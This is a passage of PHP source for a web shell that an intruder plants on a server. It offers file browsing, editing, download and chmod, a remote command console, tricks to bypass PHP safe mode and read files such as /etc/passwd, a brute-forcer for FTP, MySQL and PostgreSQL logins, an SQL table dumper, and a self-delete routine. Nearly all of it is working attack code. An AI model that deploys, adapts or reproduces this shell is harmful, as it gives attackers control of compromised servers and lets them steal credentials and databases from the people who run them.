                    $_SESSION['f'] = @$_POST['f'];
                    foreach($_SESSION['f'] as $k => $f)
                        $_SESSION['f'][$k] = urldecode($f);
                    $_SESSION['cwd'] = @$_POST['c'];
                }
                break;
        }
        echo

'<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
    }
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS

['cwd']);
    if($dirContent === false) {    echo 'Can\'t open this folder!';

return;    }
    global $sort;
    $sort = array('name', 1);
    if(!empty($_POST['p1'])) {
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
            $sort = array($match[1], (int)$match[2]);
    }
?>
<script>
    function sa() {
        for(i=0;i<document.files.elements.length;i++)
            if(document.files.elements[i].type == 'checkbox')
                document.files.elements[i].checked =

document.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post>
<?php
    echo "<tr><th width='13px'><input type=checkbox onclick='sa()'

class=chkbx></th><th><a href='#' onclick='g

(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a

href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?

0:1)."\")'>Size</a></th><th><a href='#' onclick='g

(\"FilesMan\",null,\"s_modify_".($sort[1]?

0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#'

onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?

0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
    $dirs = $files = $links = array();
    $n = count($dirContent);
    for($i=0;$i<$n;$i++) {
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array('name' => $dirContent[$i],
                     'path' => $GLOBALS['cwd'].$dirContent[$i],
                     'modify' => date('Y-m-d H:i:s',@filemtime

($GLOBALS['cwd'].$dirContent[$i])),
                     'perms' => viewPermsColor($GLOBALS

['cwd'].$dirContent[$i]),
                     'size' => @filesize($GLOBALS['cwd'].$dirContent

[$i]),
                     'owner' => $ow['name']?$ow['name']:@fileowner

($dirContent[$i]),
                     'group' => $gr['name']?$gr['name']:@filegroup

($dirContent[$i])
                    );
        if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
            $files[] = array_merge($tmp, array('type' => 'file'));
        elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
            $links[] = array_merge($tmp, array('type' => 'link'));
        elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&&

($dirContent[$i] != "."))
            $dirs[] = array_merge($tmp, array('type' => 'dir'));
    }
    $GLOBALS['sort'] = $sort;
    function cmp($a, $b) {
        if($GLOBALS['sort'][0] != 'size')
            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS

['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
        else
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS

['sort'][1]?1:-1);
    }
    usort($files, "cmp");
    usort($dirs, "cmp");
    usort($links, "cmp");
    $files = array_merge($dirs, $links, $files);
    $l = 0;
    foreach($files as $f) {
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox

name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a

href=# onclick="'.(($f['type']=='file')?'g

(\'FilesTools\',null,\''.urlencode($f['name']).'\',

\'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f

['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]

</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f

['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f

['group'].'</td><td><a href=# onclick="g

(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f

['perms']
            .'</td><td><a href="#" onclick="g

(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a>

<a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f

['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#"

onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',

\'edit\')">E</a> <a href="#" onclick="g

(\'FilesTools\',null,\''.urlencode($f['name']).'\',

\'download\')">D</a>':'').'</td></tr>';
        $l = $l?0:1;
    }
    ?>
    <tr><td colspan=7>
    <input type=hidden name=a value='FilesMan'>
    <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS

['cwd'])?>'>
    <input type=hidden name=charset value='<?=isset($_POST

['charset'])?$_POST['charset']:''?>'>
    <select name='p1'><option value='copy'>Copy</option><option

value='move'>Move</option><option value='delete'>Delete</option><?php

if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option

value='paste'>Paste</option><?php }?></select>&nbsp;<input

type="submit" value=">>"></td></tr>
    </form></table></div>
    <?php
    printFooter();
}
 
function actionStringTools() {
    if(!function_exists('hex2bin')) {function hex2bin($p) {return

decbin(hexdec($p));}}
    if(!function_exists('hex2ascii')) {function hex2ascii($p)

{$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p

[$i+1]));}return $r;}}
    if(!function_exists('ascii2hex')) {function ascii2hex($p)

{$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return

strtoupper($r);}}
    if(!function_exists('full_urlencode')) {function full_urlencode

($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p

[$i]));return strtoupper($r);}}
    
    if(isset($_POST['ajax'])) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        if(function_exists($_POST['p1']))
            echo $_POST['p1']($_POST['p2']);
        $temp = "document.getElementById

('strOutput').style.display='';document.getElementById

('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean

()),"\n\r\t\\'\0")."';\n";
        echo strlen($temp), "\n", $temp;
        exit;
    }
    printHeader();
    echo '<h1>String conversions</h1><div class=content>';
    $stringTools = array(
        'Base64 encode' => 'base64_encode',
        'Base64 decode' => 'base64_decode',
        'Url encode' => 'urlencode',
        'Url decode' => 'urldecode',
        'Full urlencode' => 'full_urlencode',
        'md5 hash' => 'md5',
        'sha1 hash' => 'sha1',
        'crypt' => 'crypt',
        'CRC32' => 'crc32',
        'ASCII to HEX' => 'ascii2hex',
        'HEX to ASCII' => 'hex2ascii',
        'HEX to DEC' => 'hexdec',
        'HEX to BIN' => 'hex2bin',
        'DEC to HEX' => 'dechex',
        'DEC to BIN' => 'decbin',
        'BIN to HEX' => 'bin2hex',
        'BIN to DEC' => 'bindec',       
        'String to lower case' => 'strtolower',
        'String to upper case' => 'strtoupper',
        'Htmlspecialchars' => 'htmlspecialchars',
        'String length' => 'strlen',
    );
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a

(null,null,this.selectTool.value,this.input.value);}else{g

(null,null,this.selectTool.value,this.input.value);} return

false;'><select name='selectTool'>";
    foreach($stringTools as $k => $v)
        echo "<option value='".htmlspecialchars

($v)."'>".$k."</option>";
        echo "</select><input type='submit' value='>>'/> <input

type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER

['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea

name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars

(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty

($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
    if(!empty($_POST['p1'])) {
        if(function_exists($_POST['p1']))
        echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo"</pre></div>";
    ?>
    <br><h1>Search for hash:</h1><div class=content>
        <form method='post' target='_blank' name="hf">
            <input type="text" name="hash" style="width:200px;"><br>
            <input type="button" value="hashcrack.com"

onclick="document.hf.action='http://www.hashcrack.com/index.php';docum

ent.hf.submit()"><br>
            <input type="button" value="milw0rm.com"

onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php

';document.hf.submit()"><br>
            <input type="button" value="hashcracking.info"

onclick="document.hf.action='https://hashcracking.info/index.php';docu

ment.hf.submit()"><br>
            <input type="button" value="md5.rednoize.com"

onclick="document.hf.action='http://md5.rednoize.com/?

q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
            <input type="button" value="md5decrypter.com"

onclick="document.hf.action='http://www.md5decrypter.com/';document.hf

.submit()"><br>
        </form>
    </div>
    <?php
    printFooter();
}
 
function actionFilesTools() {
    if( isset($_POST['p1']) )
        $_POST['p1'] = urldecode($_POST['p1']);
    if(@$_POST['p2']=='download') {
        if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment;

filename=".basename($_POST['p1']));
            if (function_exists("mime_content_type")) {
                $type = @mime_content_type($_POST['p1']);
                header("Content-Type: ".$type);
            }
            $fp = @fopen($_POST['p1'], "r");
            if($fp) {
                while(!@feof($fp))
                    echo @fread($fp, 1024);
                fclose($fp);
            }
        } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
 
        }
        exit;
    }
    if( @$_POST['p2'] == 'mkfile' ) {
        if(!file_exists($_POST['p1'])) {
            $fp = @fopen($_POST['p1'], 'w');
            if($fp) {
                $_POST['p2'] = "edit";
                fclose($fp);
            }
        }
    }
    printHeader();
    echo '<h1>File tools</h1><div class=content>';
    if( !file_exists(@$_POST['p1']) ) {
        echo 'File not exists';
        printFooter();
        return;
    }
    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
    $gid = @posix_getgrgid(@fileowner($_POST['p1']));
    echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).'

<span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST

['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST

['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid

['name'].'<br>';
    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime

($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d

H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y

-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
    if( empty($_POST['p2']) )
        $_POST['p2'] = 'view';
    if( is_file($_POST['p1']) )
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit',

'Chmod', 'Rename', 'Touch');
    else
        $m = array('Chmod', 'Rename', 'Touch');
    foreach($m as $v)
        echo '<a href=# onclick="g(null,null,null,\''.strtolower

($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]

</b>':$v).'</a> ';
    echo '<br><br>';
    switch($_POST['p2']) {
        case 'view':
            echo '<pre class=ml1>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</pre>';
            break;
        case 'highlight':
            if( is_readable($_POST['p1']) ) {
                echo '<div class=ml1 style="background-color:

#e1e1e1;color:black;">';
                $code = highlight_file($_POST['p1'],true);
                echo str_replace(array('<span ','</span>'), array

('<font ','</font>'),$code).'</div>';
            }
            break;
        case 'chmod':
            if( !empty($_POST['p3']) ) {
                $perms = 0;
                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen

($_POST['p3'])-$i-1));
                if(!@chmod($_POST['p1'], $perms))
                    echo 'Can\'t set permissions!

<br><script>document.mf.p3.value="";</script>';
                else
                    die('<script>g(null,null,null,null,"")</script>');
            }
            echo '<form onsubmit="g

(null,null,null,null,this.chmod.value);return false;"><input type=text

name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-

4).'"><input type=submit value=">>"></form>';
            break;
        case 'edit':
            if( !is_writable($_POST['p1'])) {
                echo 'File isn\'t writeable';
                break;
            }
            if( !empty($_POST['p3']) ) {
                @file_put_contents($_POST['p1'],$_POST['p3']);
                echo 'Saved!

<br><script>document.mf.p3.value="";</script>';
            }
            echo '<form onsubmit="g

(null,null,null,null,this.text.value);return false;"><textarea

name=text class=bigarea>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</textarea><input type=submit value=">>"></form>';
            break;
        case 'hexdump':
            $c = @file_get_contents($_POST['p1']);
            $n = 0;
            $h = array('00000000<br>','','');
            $len = strlen($c);
            for ($i=0; $i<$len; ++$i) {
                $h[1] .= sprintf('%02X',ord($c[$i])).' ';
                switch ( ord($c[$i]) ) {
                    case 0:  $h[2] .= ' '; break;
                    case 9:  $h[2] .= ' '; break;
                    case 10: $h[2] .= ' '; break;
                    case 13: $h[2] .= ' '; break;
                    default: $h[2] .= $c[$i]; break;
                }
                $n++;
                if ($n == 32) {
                    $n = 0;
                    if ($i+1 < $len) {$h[0] .= sprintf('%

08X',$i+1).'<br>';}
                    $h[1] .= '<br>';
                    $h[2] .= "\n";
                }
             }
            echo '<table cellspacing=1 cellpadding=5

bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight:

normal;"><pre>'.$h[0].'</pre></span></td><td

bgcolor=#282828><pre>'.$h[1].'</pre></td><td

bgcolor=#333333><pre>'.htmlspecialchars($h

[2]).'</pre></td></tr></table>';
            break;
        case 'rename':
            if( !empty($_POST['p3']) ) {
                if(!@rename($_POST['p1'], $_POST['p3']))
                    echo 'Can\'t rename!

<br><script>document.mf.p3.value="";</script>';
                else
                    die('<script>g(null,null,"'.urlencode($_POST

['p3']).'",null,"")</script>');
            }
            echo '<form onsubmit="g

(null,null,null,null,this.name.value);return false;"><input type=text

name=name value="'.htmlspecialchars($_POST['p1']).'"><input

type=submit value=">>"></form>';
            break;
        case 'touch':
            if( !empty($_POST['p3']) ) {
                $time = strtotime($_POST['p3']);
                if($time) {
                    if(@touch($_POST['p1'],$time,$time))
                        die('<script>g(null,null,null,null,"")

</script>');
                    else {
                        echo 'Fail!

<script>document.mf.p3.value="";</script>';
                    }
                } else echo 'Bad time format!

<script>document.mf.p3.value="";</script>';
            }
            echo '<form onsubmit="g

(null,null,null,null,this.touch.value);return false;"><input type=text

name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST

['p1'])).'"><input type=submit value=">>"></form>';
            break;
        case 'mkfile':
            
            break;
    }
    echo '</div>';
    printFooter();
}
 
function actionSafeMode() {
    $temp='';
    ob_start();
    switch($_POST['p1']) {
        case 1:
            $temp=@tempnam($test, 'cx');
            if(@copy("compress.zlib://".$_POST['p2'], $temp)){
                echo @file_get_contents($temp);
                unlink($temp);
            } else
                echo 'Sorry... Can\'t open file';
            break;
        case 2:
            $files = glob($_POST['p2'].'*');
            if( is_array($files) )
                foreach ($files as $filename)
                    echo $filename."\n";
            break;
        case 3:
            $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
            curl_exec($ch);
            break;
        case 4:
            ini_restore("safe_mode");
            ini_restore("open_basedir");
            include($_POST['p2']);
            break;
        case 5:
            for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                $uid = @posix_getpwuid($_POST['p2']);
                if ($uid)
                    echo join(':',$uid)."\n";
            }
            break;
        case 6:
            if(!function_exists('imap_open'))break;
            $stream = imap_open($_POST['p2'], "", "");
            if ($stream == FALSE)
                break;
            echo imap_body($stream, 1);
            imap_close($stream);
            break;
    }
    $temp = ob_get_clean();
    printHeader();
    echo '<h1>Safe mode bypass</h1><div class=content>';
    echo '<span>Copy (read file)</span><form onsubmit=\'g

(null,null,"1",this.param.value);return false;\'><input type=text

name=param><input type=submit value=">>"></form><br><span>Glob (list

dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return

false;\'><input type=text name=param><input type=submit

value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g

(null,null,"3",this.param.value);return false;\'><input type=text

name=param><input type=submit value=">>"></form><br><span>Ini_restore

(read file)</span><form onsubmit=\'g

(null,null,"4",this.param.value);return false;\'><input type=text

name=param><input type=submit

value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)

</span><table><form onsubmit=\'g

(null,null,"5",this.param1.value,this.param2.value);return

false;\'><tr><td>From</td><td><input type=text name=param1

value=0></td></tr><tr><td>To</td><td><input type=text name=param2

value=1000></td></tr></table><input type=submit

value=">>"></form><br><br><span>Imap_open (read file)</span><form

onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input

type=text name=param><input type=submit value=">>"></form>';
    if($temp)
        echo '<pre class="ml1" style="margin-top:5px"

id="Output">'.$temp.'</pre>';
    echo '</div>';
    printFooter();
}
 
function actionConsole() {
    if(isset($_POST['ajax'])) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        echo "document.cf.cmd.value='';\n";
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$

".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    {
            if(@chdir($match[1])) {
                $GLOBALS['cwd'] = @getcwd();
                echo "document.mf.c.value='".$GLOBALS['cwd']."';";
            }
        }
        echo "document.cf.output.value+='".$temp."';";
        echo "document.cf.output.scrollTop =

document.cf.output.scrollHeight;";
        $temp = ob_get_clean();
        echo strlen($temp), "\n", $temp;
        exit;
    }
    printHeader();
?>
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
    var n = (window.Event) ? e.which : e.keyCode;
    if(n == 38) {
        cur--;
        if(cur>=0)
            document.cf.cmd.value = cmds[cur];
        else
            cur++;
    } else if(n == 40) {
        cur++;
        if(cur < cmds.length)
            document.cf.cmd.value = cmds[cur];
        else
            cur--;
    }
}
function add(cmd) {
    cmds.pop();
    cmds.push(cmd);
    cmds.push("");
    cur = cmds.length-1;
}
</script>
<?php
    echo '<h1>Console</h1><div class=content><form name=cf

onsubmit="if(document.cf.cmd.value==\'clear\')

{document.cf.output.value=\'\';document.cf.cmd.value=\'\';return

false;}add(this.cmd.value);if(this.ajax.checked){a

(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return

false;"><select name=alias>';
    foreach($GLOBALS['aliases'] as $n => $v) {
        if($v == '') {
            echo '<optgroup label="-'.htmlspecialchars

($n).'-"></optgroup>';
            continue;
        }
        echo '<option value="'.htmlspecialchars

($v).'">'.$n.'</option>';
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo '</select><input type=button onclick="add

(document.cf.alias.value);if(document.cf.ajax.checked){a

(null,null,document.cf.alias.value);}else{g

(null,null,document.cf.alias.value);}" value=">>"> <input

type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER

['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea

class=bigarea name=output style="border-bottom:0;margin:0;"

readonly>';
    if(!empty($_POST['p1'])) {
        echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST

['p1']));
    }
    echo '</textarea><input type=text name=cmd style="border-

top:0;width:100%;margin:0;" onkeydown="kp(event);">';
    echo '</form></div><script>document.cf.cmd.focus();</script>';
    printFooter();
}
 
function actionLogout() {
    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
    echo 'bye!';
}
 
function actionSelfRemove() {
    printHeader();
    if($_POST['p1'] == 'yes') {
        if(@unlink(SELF_PATH))
            die('Shell has been removed');
        else
            echo 'unlink error!';
    }
    echo '<h1>Suicide</h1><div class=content>Really want to remove the

shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    printFooter();
}
 
function actionBruteforce() {
    printHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span>

'.htmlspecialchars($_POST['proto']).' <span>Server:</span>

'.htmlspecialchars($_POST['server']).'<br>';
        if( $_POST['proto'] == 'ftp' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.$port?$port:3306,

$login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."'

user='".$login."' password='".$pass."' dbname=''";
                $res = @pg_connect($server[0].':'.$server[1]?$server

[1]:5432, $login, $pass);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0],

$line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line

[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line

[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line

[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST

['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST

['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span>

$success</div><br>";
    }
    echo '<h1>FTP bruteforce</h1><div class=content><table><form

method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option

value=mysql>MySql</option><option

value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars

($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST

['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars

($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server

value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked>

/etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input

type=checkbox name=reverse value=1 checked> reverse (login -> nigol)

</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type

value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-

left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="komsen"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars

($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit

value=">>"></td></tr></form></table>';
    echo '</div><br>';
    printFooter();
}
 
function actionSql() {
    class DbClass {
        var $type;
        var $link;
        var $res;
        function DbClass($type)    {
            $this->type = $type;
        }
        function connect($host, $user, $pass, $dbname){
            switch($this->type)    {
                case 'mysql':
                    if( $this->link = @mysql_connect

($host,$user,$pass,true) ) return true;
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if(!$host[1]) $host[1]=5432;
                    if( $this->link = @pg_connect("host={$host[0]}

port={$host[1]} user=$user password=$pass dbname=$dbname") ) return

true;
                    break;
            }
            return false;
        }
        function selectdb($db) {
            switch($this->type)    {
                case 'mysql':
                    if (@mysql_select_db($db))return true;
                    break;
            }
            return false;
        }
        function query($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                    break;
                case 'pgsql':
                    return $this->res = @pg_query($this->link,$str);
                    break;
            }
            return false;
        }
        function fetch() {
            $res = func_num_args()?func_get_arg(0):$this->res;
            switch($this->type)    {
                case 'mysql':
                    return @mysql_fetch_assoc($res);
                    break;
                case 'pgsql':
                    return @pg_fetch_assoc($res);
                    break;
            }
            return false;
        }
        function listDbs() {
            switch($this->type)    {
                case 'mysql':
                    return $this->res = @mysql_list_dbs($this->link);
                break;
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname

FROM pg_database");
                break;
            }
            return false;
        }
        function listTables() {
            switch($this->type)    {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                break;
                case 'pgsql':
                    return $this->res = $this->query("select

table_name from information_schema.tables where (table_schema !=

'information_schema' AND table_schema != 'pg_catalog') or table_name =

'pg_user'");
                break;
            }
            return false;
        }
        function error() {
            switch($this->type)    {
                case 'mysql':
                    return @mysql_error($this->link);
                break;
                case 'pgsql':
                    return @pg_last_error($this->link);
                break;
            }
            return false;
        }
        function setCharset($str) {
            switch($this->type)    {
                case 'mysql':
                    if(function_exists('mysql_set_charset'))
                        return @mysql_set_charset($str, $this->link);
                    else
                        $this->query('SET CHARSET '.$str);
                    break;
                case 'mysql':
                    return @pg_set_client_encoding($this->link, $str);
                    break;
            }
            return false;
        }
        function dump($table) {
            switch($this->type)    {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE

`'.$table.'`');
                    $create = mysql_fetch_array($res);
                    echo $create[1].";\n\n";
                    $this->query('SELECT * FROM `'.$table.'`');
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".@mysql_real_escape_string

($v)."'";
                            $columns[] = "`".$k."`";
                        }
                    echo 'INSERT INTO `'.$table.'` ('.implode(", ",

$columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                break;
                case 'pgsql':
                    $this->query('SELECT * FROM '.$table);
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".addslashes($v)."'";
                            $columns[] = $k;
                        }
                    echo 'INSERT INTO '.$table.' ('.implode(", ",

$columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                break;
            }
            return false;
        }
    };
    $db = new DbClass($_POST['type']);
    if(@$_POST['p2']=='download') {
        ob_start("ob_gzhandler", 4096);
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST

['sql_pass'], $_POST['sql_base']);
        $db->selectdb($_POST['sql_base']);
        header("Content-Disposition: attachment; filename=dump.sql");
        header("Content-Type: text/plain");
        foreach($_POST['tbl'] as $v)
                $db->dump($v);
        exit;
    }
    printHeader();
    ?>
    <h1>Sql browser</h1><div class=content>
    <form name="sf" method="post">
        <table cellpadding="2" cellspacing="0">
            <tr>
                <td>Type</td>
                <td>Host</td>
                <td>Login</td>
                <td>Password</td>
                <td>Database</td>
                <td></td>
            </tr>
            <tr>
                <input type=hidden name=a value=Sql>
                <input type=hidden name=p1 value='query'>
                <input type=hidden name=p2>
                <input type=hidden name=c value='<?=htmlspecialchars

($GLOBALS['cwd']);?>'>
                <input type=hidden name=charset value='<?=isset

($_POST['charset'])?$_POST['charset']:''?>'>
                <td>
                    <select name='type'>
                        <option value="mysql" <?php if(@$_POST

['type']=='mysql')echo 'selected';?>>MySql</option>
                        <option value="pgsql" <?php if(@$_POST

['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
                    </select></td>
                <td><input type=text name=sql_host value='<?=(empty

($_POST['sql_host'])?'localhost':htmlspecialchars($_POST

['sql_host']));?>'></td>
                <td><input type=text name=sql_login value='<?=(empty

($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?

>'></td>
                <td><input type=text name=sql_pass value='<?=(empty

($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?

>'></td>
                <td>
    <?php
    $tmp = "<input type=text name=sql_base value=''>";
    if(isset($_POST['sql_host'])){
        if($db->connect($_POST['sql_host'], $_POST['sql_login'],

$_POST['sql_pass'], $_POST['sql_base'])) {
            switch($_POST['charset']) {
                case "Windows-1251": $db->setCharset('cp1251'); break;
                case "UTF-8": $db->setCharset('utf8'); break;
                case "KOI8-R": $db->setCharset('koi8r'); break;
                case "KOI8-U": $db->setCharset('koi8u'); break;
                case "cp866": $db->setCharset('cp866'); break;
            }
            $db->listDbs();
            echo "<select name=sql_base><option value=''></option>";
            while($item = $db->fetch()) {
                list($key, $value) = each($item);
                echo '<option value="'.$value.'" '.($value==$_POST

['sql_base']?'selected':'').'>'.$value.'</option>';
            }
            echo '</select>';
        }
        else echo $tmp;
    }else
        echo $tmp;
    ?></td>
                <td><input type=submit value=">>"></td>
            </tr>
        </table>
        <script>
            function st(t,l) {
                document.sf.p1.value = 'select';
                document.sf.p2.value = t;
                if(l!=null)document.sf.p3.value = l;
                document.sf.submit();
            }
            function is() {
                for(i=0;i<document.sf.elements['tbl[]'].length;++i)
                    document.sf.elements['tbl[]'][i].checked = !

document.sf.elements['tbl[]'][i].checked;
            }
        </script>
    <?php
    if(isset($db) && $db->link){
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
            if(!empty($_POST['sql_base'])){
                $db->selectdb($_POST['sql_base']);
                echo "<tr><td width=1 style='border-top:2px solid

#666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
                $tbls_res = $db->listTables();
                while($item = $db->fetch($tbls_res)) {
                    list($key, $value) = each($item);
                    $n = $db->fetch($db->query('SELECT COUNT(*) as n

FROM '.$value.''));
                    $value = htmlspecialchars($value);
                    echo "<nobr><input type='checkbox' name='tbl[]'

